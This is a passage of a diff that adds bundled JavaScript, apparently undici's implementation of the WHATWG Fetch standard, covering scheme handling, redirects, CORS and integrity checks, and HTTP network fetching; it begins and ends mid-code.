type + // - should internalResponse to request be blocked due to nosniff + // TODO + + // 18. If response’s type is "opaque", internalResponse’s status is 206, + // internalResponse’s range-requested flag is set, and request’s header + // list does not contain `Range`, then set response and internalResponse + // to a network error. + if ( + response.type === 'opaque' && + internalResponse.status === 206 && + internalResponse.rangeRequested && + !request.headers.contains('range') + ) { + response = internalResponse = makeNetworkError() + } + + // 19. If response is not a network error and either request’s method is + // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, + // set internalResponse’s body to null and disregard any enqueuing toward + // it (if any). + if ( + response.status !== 0 && + (request.method === 'HEAD' || + request.method === 'CONNECT' || + nullBodyStatus.includes(internalResponse.status)) + ) { + internalResponse.body = null + fetchParams.controller.dump = true + } + + // 20. If request’s integrity metadata is not the empty string, then: + if (request.integrity) { + // 1. Let processBodyError be this step: run fetch finale given fetchParams + // and a network error. + const processBodyError = (reason) => + fetchFinale(fetchParams, makeNetworkError(reason)) + + // 2. If request’s response tainting is "opaque", or response’s body is null, + // then run processBodyError and abort these steps. + if (request.responseTainting === 'opaque' || response.body == null) { + processBodyError(response.error) + return + } + + // 3. Let processBody given bytes be these steps: + const processBody = (bytes) => { + // 1. If bytes do not match request’s integrity metadata, + // then run processBodyError and abort these steps. [SRI] + if (!bytesMatch(bytes, request.integrity)) { + processBodyError('integrity mismatch') + return + } + + // 2. Set response’s body to bytes as a body. + response.body = safelyExtractBody(bytes)[0] + + // 3. Run fetch finale given fetchParams and response. + fetchFinale(fetchParams, response) + } + + // 4. Fully read response’s body given processBody and processBodyError. + await fullyReadBody(response.body, processBody, processBodyError) + } else { + // 21. Otherwise, run fetch finale given fetchParams and response. + fetchFinale(fetchParams, response) + } +} + +// https://fetch.spec.whatwg.org/#concept-scheme-fetch +// given a fetch params fetchParams +function schemeFetch (fetchParams) { + // Note: since the connection is destroyed on redirect, which sets fetchParams to a + // cancelled state, we do not want this condition to trigger *unless* there have been + // no redirects. See https://github.com/nodejs/undici/issues/1776 + // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { + return Promise.resolve(makeAppropriateNetworkError(fetchParams)) + } + + // 2. Let request be fetchParams’s request. + const { request } = fetchParams + + const { protocol: scheme } = requestCurrentURL(request) + + // 3. Switch on request’s current URL’s scheme and run the associated steps: + switch (scheme) { + case 'about:': { + // If request’s current URL’s path is the string "blank", then return a new response + // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », + // and body is the empty byte sequence as a body. + + // Otherwise, return a network error. + return Promise.resolve(makeNetworkError('about scheme is not supported')) + } + case 'blob:': { + if (!resolveObjectURL) { + resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) + } + + // 1. Let blobURLEntry be request’s current URL’s blob URL entry. + const blobURLEntry = requestCurrentURL(request) + + // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 + // Buffer.resolveObjectURL does not ignore URL queries. + if (blobURLEntry.search.length !== 0) { + return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) + } + + const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) + + // 2. If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s + // object is not a Blob object, then return a network error. + if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { + return Promise.resolve(makeNetworkError('invalid method')) + } + + // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. + const bodyWithType = safelyExtractBody(blobURLEntryObject) + + // 4. Let body be bodyWithType’s body. + const body = bodyWithType[0] + + // 5. Let length be body’s length, serialized and isomorphic encoded. + const length = isomorphicEncode(`${body.length}`) + + // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. + const type = bodyWithType[1] ?? '' + + // 7. Return a new response whose status message is `OK`, header list is + // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. + const response = makeResponse({ + statusText: 'OK', + headersList: [ + ['content-length', { name: 'Content-Length', value: length }], + ['content-type', { name: 'Content-Type', value: type }] + ] + }) + + response.body = body + + return Promise.resolve(response) + } + case 'data:': { + // 1. Let dataURLStruct be the result of running the + // data: URL processor on request’s current URL. + const currentURL = requestCurrentURL(request) + const dataURLStruct = dataURLProcessor(currentURL) + + // 2. If dataURLStruct is failure, then return a + // network error. + if (dataURLStruct === 'failure') { + return Promise.resolve(makeNetworkError('failed to fetch the data URL')) + } + + // 3. Let mimeType be dataURLStruct’s MIME type, serialized. + const mimeType = serializeAMimeType(dataURLStruct.mimeType) + + // 4. Return a response whose status message is `OK`, + // header list is « (`Content-Type`, mimeType) », + // and body is dataURLStruct’s body as a body. + return Promise.resolve(makeResponse({ + statusText: 'OK', + headersList: [ + ['content-type', { name: 'Content-Type', value: mimeType }] + ], + body: safelyExtractBody(dataURLStruct.body)[0] + })) + } + case 'file:': { + // For now, unfortunate as it is, file URLs are left as an exercise for the reader. + // When in doubt, return a network error. + return Promise.resolve(makeNetworkError('not implemented... yet...')) + } + case 'http:': + case 'https:': { + // Return the result of running HTTP fetch given fetchParams. + + return httpFetch(fetchParams) + .catch((err) => makeNetworkError(err)) + } + default: { + return Promise.resolve(makeNetworkError('unknown scheme')) + } + } +} + +// https://fetch.spec.whatwg.org/#finalize-response +function finalizeResponse (fetchParams, response) { + // 1. Set fetchParams’s request’s done flag. + fetchParams.request.done = true + + // 2, If fetchParams’s process response done is not null, then queue a fetch + // task to run fetchParams’s process response done given response, with + // fetchParams’s task destination. + if (fetchParams.processResponseDone != null) { + queueMicrotask(() => fetchParams.processResponseDone(response)) + } +} + +// https://fetch.spec.whatwg.org/#fetch-finale +function fetchFinale (fetchParams, response) { + // 1. If response is a network error, then: + if (response.type === 'error') { + // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». + response.urlList = [fetchParams.request.urlList[0]] + + // 2. Set response’s timing info to the result of creating an opaque timing + // info for fetchParams’s timing info. + response.timingInfo = createOpaqueTimingInfo({ + startTime: fetchParams.timingInfo.startTime + }) + } + + // 2. Let processResponseEndOfBody be the following steps: + const processResponseEndOfBody = () => { + // 1. Set fetchParams’s request’s done flag. + fetchParams.request.done = true + + // If fetchParams’s process response end-of-body is not null, + // then queue a fetch task to run fetchParams’s process response + // end-of-body given response with fetchParams’s task destination. + if (fetchParams.processResponseEndOfBody != null) { + queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) + } + } + + // 3. If fetchParams’s process response is non-null, then queue a fetch task + // to run fetchParams’s process response given response, with fetchParams’s + // task destination. + if (fetchParams.processResponse != null) { + queueMicrotask(() => fetchParams.processResponse(response)) + } + + // 4. If response’s body is null, then run processResponseEndOfBody. + if (response.body == null) { + processResponseEndOfBody() + } else { + // 5. Otherwise: + + // 1. Let transformStream be a new a TransformStream. + + // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, + // enqueues chunk in transformStream. + const identityTransformAlgorithm = (chunk, controller) => { + controller.enqueue(chunk) + } + + // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm + // and flushAlgorithm set to processResponseEndOfBody. + const transformStream = new TransformStream({ + start () {}, + transform: identityTransformAlgorithm, + flush: processResponseEndOfBody + }, { + size () { + return 1 + } + }, { + size () { + return 1 + } + }) + + // 4. Set response’s body to the result of piping response’s body through transformStream. + response.body = { stream: response.body.stream.pipeThrough(transformStream) } + } + + // 6. If fetchParams’s process response consume body is non-null, then: + if (fetchParams.processResponseConsumeBody != null) { + // 1. Let processBody given nullOrBytes be this step: run fetchParams’s + // process response consume body given response and nullOrBytes. + const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) + + // 2. Let processBodyError be this step: run fetchParams’s process + // response consume body given response and failure. + const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) + + // 3. If response’s body is null, then queue a fetch task to run processBody + // given null, with fetchParams’s task destination. + if (response.body == null) { + queueMicrotask(() => processBody(null)) + } else { + // 4. Otherwise, fully read response’s body given processBody, processBodyError, + // and fetchParams’s task destination. + return fullyReadBody(response.body, processBody, processBodyError) + } + return Promise.resolve() + } +} + +// https://fetch.spec.whatwg.org/#http-fetch +async function httpFetch (fetchParams) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. Let actualResponse be null. + let actualResponse = null + + // 4. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 5. If request’s service-workers mode is "all", then: + if (request.serviceWorkers === 'all') { + // TODO + } + + // 6. If response is null, then: + if (response === null) { + // 1. If makeCORSPreflight is true and one of these conditions is true: + // TODO + + // 2. If request’s redirect mode is "follow", then set request’s + // service-workers mode to "none". + if (request.redirect === 'follow') { + request.serviceWorkers = 'none' + } + + // 3. Set response and actualResponse to the result of running + // HTTP-network-or-cache fetch given fetchParams. + actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) + + // 4. If request’s response tainting is "cors" and a CORS check + // for request and response returns failure, then return a network error. + if ( + request.responseTainting === 'cors' && + corsCheck(request, response) === 'failure' + ) { + return makeNetworkError('cors failure') + } + + // 5. If the TAO check for request and response returns failure, then set + // request’s timing allow failed flag. + if (TAOCheck(request, response) === 'failure') { + request.timingAllowFailed = true + } + } + + // 7. If either request’s response tainting or response’s type + // is "opaque", and the cross-origin resource policy check with + // request’s origin, request’s client, request’s destination, + // and actualResponse returns blocked, then return a network error. + if ( + (request.responseTainting === 'opaque' || response.type === 'opaque') && + crossOriginResourcePolicyCheck( + request.origin, + request.client, + request.destination, + actualResponse + ) === 'blocked' + ) { + return makeNetworkError('blocked') + } + + // 8. If actualResponse’s status is a redirect status, then: + if (redirectStatusSet.has(actualResponse.status)) { + // 1. If actualResponse’s status is not 303, request’s body is not null, + // and the connection uses HTTP/2, then user agents may, and are even + // encouraged to, transmit an RST_STREAM frame. + // See, https://github.com/whatwg/fetch/issues/1288 + if (request.redirect !== 'manual') { + fetchParams.controller.connection.destroy() + } + + // 2. Switch on request’s redirect mode: + if (request.redirect === 'error') { + // Set response to a network error. + response = makeNetworkError('unexpected redirect') + } else if (request.redirect === 'manual') { + // Set response to an opaque-redirect filtered response whose internal + // response is actualResponse. + // NOTE(spec): On the web this would return an `opaqueredirect` response, + // but that doesn't make sense server side. + // See https://github.com/nodejs/undici/issues/1193. + response = actualResponse + } else if (request.redirect === 'follow') { + // Set response to the result of running HTTP-redirect fetch given + // fetchParams and response. + response = await httpRedirectFetch(fetchParams, response) + } else { + assert(false) + } + } + + // 9. Set response’s timing info to timingInfo. + response.timingInfo = timingInfo + + // 10. Return response. + return response +} + +// https://fetch.spec.whatwg.org/#http-redirect-fetch +function httpRedirectFetch (fetchParams, response) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let actualResponse be response, if response is not a filtered response, + // and response’s internal response otherwise. + const actualResponse = response.internalResponse + ? response.internalResponse + : response + + // 3. Let locationURL be actualResponse’s location URL given request’s current + // URL’s fragment. + let locationURL + + try { + locationURL = responseLocationURL( + actualResponse, + requestCurrentURL(request).hash + ) + + // 4. If locationURL is null, then return response. + if (locationURL == null) { + return response + } + } catch (err) { + // 5. If locationURL is failure, then return a network error. + return Promise.resolve(makeNetworkError(err)) + } + + // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network + // error. + if (!urlIsHttpHttpsScheme(locationURL)) { + return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) + } + + // 7. If request’s redirect count is 20, then return a network error. + if (request.redirectCount === 20) { + return Promise.resolve(makeNetworkError('redirect count exceeded')) + } + + // 8. Increase request’s redirect count by 1. + request.redirectCount += 1 + + // 9. If request’s mode is "cors", locationURL includes credentials, and + // request’s origin is not same origin with locationURL’s origin, then return + // a network error. + if ( + request.mode === 'cors' && + (locationURL.username || locationURL.password) && + !sameOrigin(request, locationURL) + ) { + return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) + } + + // 10. If request’s response tainting is "cors" and locationURL includes + // credentials, then return a network error. + if ( + request.responseTainting === 'cors' && + (locationURL.username || locationURL.password) + ) { + return Promise.resolve(makeNetworkError( + 'URL cannot contain credentials for request mode "cors"' + )) + } + + // 11. If actualResponse’s status is not 303, request’s body is non-null, + // and request’s body’s source is null, then return a network error. + if ( + actualResponse.status !== 303 && + request.body != null && + request.body.source == null + ) { + return Promise.resolve(makeNetworkError()) + } + + // 12. If one of the following is true + // - actualResponse’s status is 301 or 302 and request’s method is `POST` + // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` + if ( + ([301, 302].includes(actualResponse.status) && request.method === 'POST') || + (actualResponse.status === 303 && + !GET_OR_HEAD.includes(request.method)) + ) { + // then: + // 1. Set request’s method to `GET` and request’s body to null. + request.method = 'GET' + request.body = null + + // 2. For each headerName of request-body-header name, delete headerName from + // request’s header list. + for (const headerName of requestBodyHeader) { + request.headersList.delete(headerName) + } + } + + // 13. If request’s current URL’s origin is not same origin with locationURL’s + // origin, then for each headerName of CORS non-wildcard request-header name, + // delete headerName from request’s header list. + if (!sameOrigin(requestCurrentURL(request), locationURL)) { + // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name + request.headersList.delete('authorization') + + // https://fetch.spec.whatwg.org/#authentication-entries + request.headersList.delete('proxy-authorization', true) + + // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. + request.headersList.delete('cookie') + request.headersList.delete('host') + } + + // 14. If request’s body is non-null, then set request’s body to the first return + // value of safely extracting request’s body’s source. + if (request.body != null) { + assert(request.body.source != null) + request.body = safelyExtractBody(request.body.source)[0] + } + + // 15. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 16. Set timingInfo’s redirect end time and post-redirect start time to the + // coarsened shared current time given fetchParams’s cross-origin isolated + // capability. + timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = + coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) + + // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s + // redirect start time to timingInfo’s start time. + if (timingInfo.redirectStartTime === 0) { + timingInfo.redirectStartTime = timingInfo.startTime + } + + // 18. Append locationURL to request’s URL list. + request.urlList.push(locationURL) + + // 19. Invoke set request’s referrer policy on redirect on request and + // actualResponse. + setRequestReferrerPolicyOnRedirect(request, actualResponse) + + // 20. Return the result of running main fetch given fetchParams and true. + return mainFetch(fetchParams, true) +} + +// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch +async function httpNetworkOrCacheFetch ( + fetchParams, + isAuthenticationFetch = false, + isNewConnectionFetch = false +) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let httpFetchParams be null. + let httpFetchParams = null + + // 3. Let httpRequest be null. + let httpRequest = null + + // 4. Let response be null. + let response = null + + // 5. Let storedResponse be null. + // TODO: cache + + // 6. Let httpCache be null. + const httpCache = null + + // 7. Let the revalidatingFlag be unset. + const revalidatingFlag = false + + // 8. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. If request’s window is "no-window" and request’s redirect mode is + // "error", then set httpFetchParams to fetchParams and httpRequest to + // request. + if (request.window === 'no-window' && request.redirect === 'error') { + httpFetchParams = fetchParams + httpRequest = request + } else { + // Otherwise: + + // 1. Set httpRequest to a clone of request. + httpRequest = makeRequest(request) + + // 2. Set httpFetchParams to a copy of fetchParams. + httpFetchParams = { ...fetchParams } + + // 3. Set httpFetchParams’s request to httpRequest. + httpFetchParams.request = httpRequest + } + + // 3. Let includeCredentials be true if one of + const includeCredentials = + request.credentials === 'include' || + (request.credentials === 'same-origin' && + request.responseTainting === 'basic') + + // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s + // body is non-null; otherwise null. + const contentLength = httpRequest.body ? httpRequest.body.length : null + + // 5. Let contentLengthHeaderValue be null. + let contentLengthHeaderValue = null + + // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or + // `PUT`, then set contentLengthHeaderValue to `0`. + if ( + httpRequest.body == null && + ['POST', 'PUT'].includes(httpRequest.method) + ) { + contentLengthHeaderValue = '0' + } + + // 7. If contentLength is non-null, then set contentLengthHeaderValue to + // contentLength, serialized and isomorphic encoded. + if (contentLength != null) { + contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) + } + + // 8. If contentLengthHeaderValue is non-null, then append + // `Content-Length`/contentLengthHeaderValue to httpRequest’s header + // list. + if (contentLengthHeaderValue != null) { + httpRequest.headersList.append('content-length', contentLengthHeaderValue) + } + + // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, + // contentLengthHeaderValue) to httpRequest’s header list. + + // 10. If contentLength is non-null and httpRequest’s keepalive is true, + // then: + if (contentLength != null && httpRequest.keepalive) { + // NOTE: keepalive is a noop outside of browser context. + } + + // 11. If httpRequest’s referrer is a URL, then append + // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, + // to httpRequest’s header list. + if (httpRequest.referrer instanceof URL) { + httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) + } + + // 12. Append a request `Origin` header for httpRequest. + appendRequestOriginHeader(httpRequest) + + // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] + appendFetchMetadata(httpRequest) + + // 14. If httpRequest’s header list does not contain `User-Agent`, then + // user agents should append `User-Agent`/default `User-Agent` value to + // httpRequest’s header list. + if (!httpRequest.headersList.contains('user-agent')) { + httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') + } + + // 15. If httpRequest’s cache mode is "default" and httpRequest’s header + // list contains `If-Modified-Since`, `If-None-Match`, + // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set + // httpRequest’s cache mode to "no-store". + if ( + httpRequest.cache === 'default' && + (httpRequest.headersList.contains('if-modified-since') || + httpRequest.headersList.contains('if-none-match') || + httpRequest.headersList.contains('if-unmodified-since') || + httpRequest.headersList.contains('if-match') || + httpRequest.headersList.contains('if-range')) + ) { + httpRequest.cache = 'no-store' + } + + // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent + // no-cache cache-control header modification flag is unset, and + // httpRequest’s header list does not contain `Cache-Control`, then append + // `Cache-Control`/`max-age=0` to httpRequest’s header list. + if ( + httpRequest.cache === 'no-cache' && + !httpRequest.preventNoCacheCacheControlHeaderModification && + !httpRequest.headersList.contains('cache-control') + ) { + httpRequest.headersList.append('cache-control', 'max-age=0') + } + + // 17. If httpRequest’s cache mode is "no-store" or "reload", then: + if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { + // 1. If httpRequest’s header list does not contain `Pragma`, then append + // `Pragma`/`no-cache` to httpRequest’s header list. + if (!httpRequest.headersList.contains('pragma')) { + httpRequest.headersList.append('pragma', 'no-cache') + } + + // 2. If httpRequest’s header list does not contain `Cache-Control`, + // then append `Cache-Control`/`no-cache` to httpRequest’s header list. + if (!httpRequest.headersList.contains('cache-control')) { + httpRequest.headersList.append('cache-control', 'no-cache') + } + } + + // 18. If httpRequest’s header list contains `Range`, then append + // `Accept-Encoding`/`identity` to httpRequest’s header list. + if (httpRequest.headersList.contains('range')) { + httpRequest.headersList.append('accept-encoding', 'identity') + } + + // 19. Modify httpRequest’s header list per HTTP. Do not append a given + // header if httpRequest’s header list contains that header’s name. + // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 + if (!httpRequest.headersList.contains('accept-encoding')) { + if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { + httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') + } else { + httpRequest.headersList.append('accept-encoding', 'gzip, deflate') + } + } + + httpRequest.headersList.delete('host') + + // 20. If includeCredentials is true, then: + if (includeCredentials) { + // 1. If the user agent is not configured to block cookies for httpRequest + // (see section 7 of [COOKIES]), then: + // TODO: credentials + // 2. If httpRequest’s header list does not contain `Authorization`, then: + // TODO: credentials + } + + // 21. If there’s a proxy-authentication entry, use it as appropriate. + // TODO: proxy-authentication + + // 22. Set httpCache to the result of determining the HTTP cache + // partition, given httpRequest. + // TODO: cache + + // 23. If httpCache is null, then set httpRequest’s cache mode to + // "no-store". + if (httpCache == null) { + httpRequest.cache = 'no-store' + } + + // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", + // then: + if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { + // TODO: cache + } + + // 9. If aborted, then return the appropriate network error for fetchParams. + // TODO + + // 10. If response is null, then: + if (response == null) { + // 1. If httpRequest’s cache mode is "only-if-cached", then return a + // network error. + if (httpRequest.mode === 'only-if-cached') { + return makeNetworkError('only if cached') + } + + // 2. Let forwardResponse be the result of running HTTP-network fetch + // given httpFetchParams, includeCredentials, and isNewConnectionFetch. + const forwardResponse = await httpNetworkFetch( + httpFetchParams, + includeCredentials, + isNewConnectionFetch + ) + + // 3. If httpRequest’s method is unsafe and forwardResponse’s status is + // in the range 200 to 399, inclusive, invalidate appropriate stored + // responses in httpCache, as per the "Invalidation" chapter of HTTP + // Caching, and set storedResponse to null. [HTTP-CACHING] + if ( + !safeMethodsSet.has(httpRequest.method) && + forwardResponse.status >= 200 && + forwardResponse.status <= 399 + ) { + // TODO: cache + } + + // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, + // then: + if (revalidatingFlag && forwardResponse.status === 304) { + // TODO: cache + } + + // 5. If response is null, then: + if (response == null) { + // 1. Set response to forwardResponse. + response = forwardResponse + + // 2. Store httpRequest and forwardResponse in httpCache, as per the + // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] + // TODO: cache + } + } + + // 11. Set response’s URL list to a clone of httpRequest’s URL list. + response.urlList = [...httpRequest.urlList] + + // 12. If httpRequest’s header list contains `Range`, then set response’s + // range-requested flag. + if (httpRequest.headersList.contains('range')) { + response.rangeRequested = true + } + + // 13. Set response’s request-includes-credentials to includeCredentials. + response.requestIncludesCredentials = includeCredentials + + // 14. If response’s status is 401, httpRequest’s response tainting is not + // "cors", includeCredentials is true, and request’s window is an environment + // settings object, then: + // TODO + + // 15. If response’s status is 407, then: + if (response.status === 407) { + // 1. If request’s window is "no-window", then return a network error. + if (request.window === 'no-window') { + return makeNetworkError() + } + + // 2. ??? + + // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams)) { + return makeAppropriateNetworkError(fetchParams) + } + + // 4. Prompt the end user as appropriate in request’s window and store + // the result as a proxy-authentication entry. [HTTP-AUTH] + // TODO: Invoke some kind of callback? + + // 5. Set response to the result of running HTTP-network-or-cache fetch given + // fetchParams. + // TODO + return makeNetworkError('proxy authentication required') + } + + // 16. If all of the following are true + if ( + // response’s status is 421 + response.status === 421 && + // isNewConnectionFetch is false + !isNewConnectionFetch && + // request’s body is null, or request’s body is non-null and request’s body’s source is non-null + (request.body == null || request.body.source != null) + ) { + // then: + + // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams)) { + return makeAppropriateNetworkError(fetchParams) + } + + // 2. Set response to the result of running HTTP-network-or-cache + // fetch given fetchParams, isAuthenticationFetch, and true. + + // TODO (spec): The spec doesn't specify this but we need to cancel + // the active response before we can start a new one. + // https://github.com/whatwg/fetch/issues/1293 + fetchParams.controller.connection.destroy() + + response = await httpNetworkOrCacheFetch( + fetchParams, + isAuthenticationFetch, + true + ) + } + + // 17. If isAuthenticationFetch is true, then create an authentication entry + if (isAuthenticationFetch) { + // TODO + } + + // 18. Return response. + return response +} + +// https://fetch.spec.whatwg.org/#http-network-fetch +async function httpNetworkFetch ( + fetchParams, + includeCredentials = false, + forceNewConnection = false +) { + assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) + + fetchParams.controller.connection = { + abort: null, + destroyed: false, + destroy (err) { + if (!this.destroyed) { + this.destroyed = true + this.abort?.(err ?? new DOMException('The operation was aborted.', 'AbortError')) + } + } + } + + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 4. Let httpCache be the result of determining the HTTP cache partition, + // given request. + // TODO: cache + const httpCache = null + + // 5. If httpCache is null, then set request’s cache mode to "no-store". + if (httpCache == null) { + request.cache = 'no-store' + } + + // 6. Let networkPartitionKey be the result of determining the network + // partition key given request. + // TODO + + // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise + // "no". + const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars + + // 8. Switch on request’s mode: + if (request.mode === 'websocket') { + // Let connection be the result of obtaining a WebSocket connection, + // given request’s current URL. + // TODO + } else { + // Let connection be the result of obtaining a connection, given + // networkPartitionKey, request’s current URL’s origin, + // includeCredentials, and forceNewConnection. + // TODO + } + + // 9. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. If connection is failure, then return a network error. + + // 2. Set timingInfo’s final connection timing info to the result of + // calling clamp and coarsen connection timing info with connection’s + // timing info, timingInfo’s post-redirect start time, and fetchParams’s + // cross-origin isolated capability. + + // 3. If connection is not an HTTP/2 connection, request’s body is non-null, + // and request’s body’s source is null, then append (`Transfer-Encoding`, + // `chunked`) to request’s header list. + + // 4. Set timingInfo’s final network-request start time to the coarsened + // shared current time given fetchParams’s cross-origin isolated + // capability. + + // 5. Set response to the result of making an HTTP request over connection + // using request with the following caveats: + + // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] + // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] + + // - If request’s body is non-null, and request’s body’s source is null, + // then the user agent may have a buffer of up to 64 kibibytes and store + // a part of request’s body in that buffer. If the user agent reads from + // request’s body beyond that buffer’s size and the user agent needs to + // resend request, then instead return a network error. + + // - Set timingInfo’s final network-response start time to the coarsened + // shared current time given fetchParams’s cross-origin isolated capability, + // immediately after the user agent’s HTTP parser receives the first byte + // of the response (e.g., frame header bytes for HTTP/2 or response status + // line for HTTP/1.x). + + // - Wait until all the headers are transmitted. + + // - Any responses whose status is in the range 100 to 199, inclusive, + // and is not 101, are to be ignored, except for the purposes of setting + // timingInfo’s final network-response start time above. + + // - If request’s header list contains `Transfer-Encoding`/`chunked` and + // response is transferred via HTTP/1.0 or older, then return a network + // error. + + // - If the HTTP request results in a TLS client certificate dialog, then: + + // 1. If request’s window is an environment settings object, make the + // dialog available in request’s window. + + // 2. Otherwise, return a network error. + + // To transmit request’s body body, run these steps: + let requestBody = null + // 1. If body is null and fetchParams’s process request end-of-body is + // non-null, then queue a fetch task given fetchParams’s process request + // end-of-body and fetchParams’s task destination. + if (request.body == null && fetchParams.processRequestEndOfBody) { + queueMicrotask(() => fetchParams.processRequestEndOfBody()) + } else if (request.body != null) { + // 2. Otherwise, if body is non-null: + + // 1. Let processBodyChunk given bytes be these steps: + const processBodyChunk = async function * (bytes) { + // 1. If the ongoing fetch is terminated, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. Run this step in parallel: transmit bytes. + yield bytes + + // 3. If fetchParams’s process request body is non-null, then run + // fetchParams’s process request body given bytes’s length. + fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) + } + + // 2. Let processEndOfBody be these steps: + const processEndOfBody = () => { + // 1. If fetchParams is canceled, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. If fetchParams’s process request end-of-body is non-null, + // then run fetchParams’s process request end-of-body. + if (fetchParams.processRequestEndOfBody) { + fetchParams.processRequestEndOfBody() + } + } + + // 3. Let processBodyError given e be these steps: + const processBodyError = (e) => { + // 1. If fetchParams is canceled, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. + if (e.name === 'AbortError') { + fetchParams.controller.abort() + } else { + fetchParams.controller.terminate(e) + } + } + + // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, + // processBodyError, and fetchParams’s task destination. + requestBody = (async function * () { + try { + for await (const bytes of request.body.stream) { + yield * processBodyChunk(bytes) + } + processEndOfBody() + } catch (err) { + processBodyError(err) + } + })() + } + + try { + // socket is only provided for websockets + const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) + + if (socket) { + response = makeResponse({ status, statusText, headersList, socket }) + } else { + const iterator = body[Symbol.asyncIterator]() + fetchParams.controller.next = () => iterator.next() + + response = makeResponse({ status, statusText, headersList }) + } + } catch (err) { + // 10. If aborted, then: + if (err.name === 'AbortError') { + // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. + fetchParams.controller.connection.destroy() + + // 2. Return the appropriate network error for fetchParams. + return makeAppropriateNetworkError(fetchParams, err) + } + + return makeNetworkError(err) + } + + // 11. Let pullAlgorithm be an action that resumes the ongoing fetch + // if it is suspended. + const pullAlgorithm = () => { + fetchParams.controller.resume() + } + + // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s + // controller with reason, given reason. + const cancelAlgorithm = (reason) => { + fetchParams.controller.abort(reason) + } + + // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by + // the user agent. + // TODO + + // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object + // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. + // TODO + + // 15. Let stream be a new ReadableStream. + // 16. Set up stream with pullAlgorithm set to pullAlgorithm, + // cancelAlgorithm set to cancelAlgorithm, highWaterMark set to + // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + const stream = new ReadableStream( + { + async start (controller) { + fetchParams.controller.controller = controller + }, + async pull (controller) { + await pullAlgorithm(controller) + }, + async cancel (reason) { + await cancelAlgorithm(reason) + } + }, + { + highWaterMark: 0, + size () { + return 1 + } + } + ) + + // 17. Run these steps, but abort when the ongoing fetch is terminated: + + // 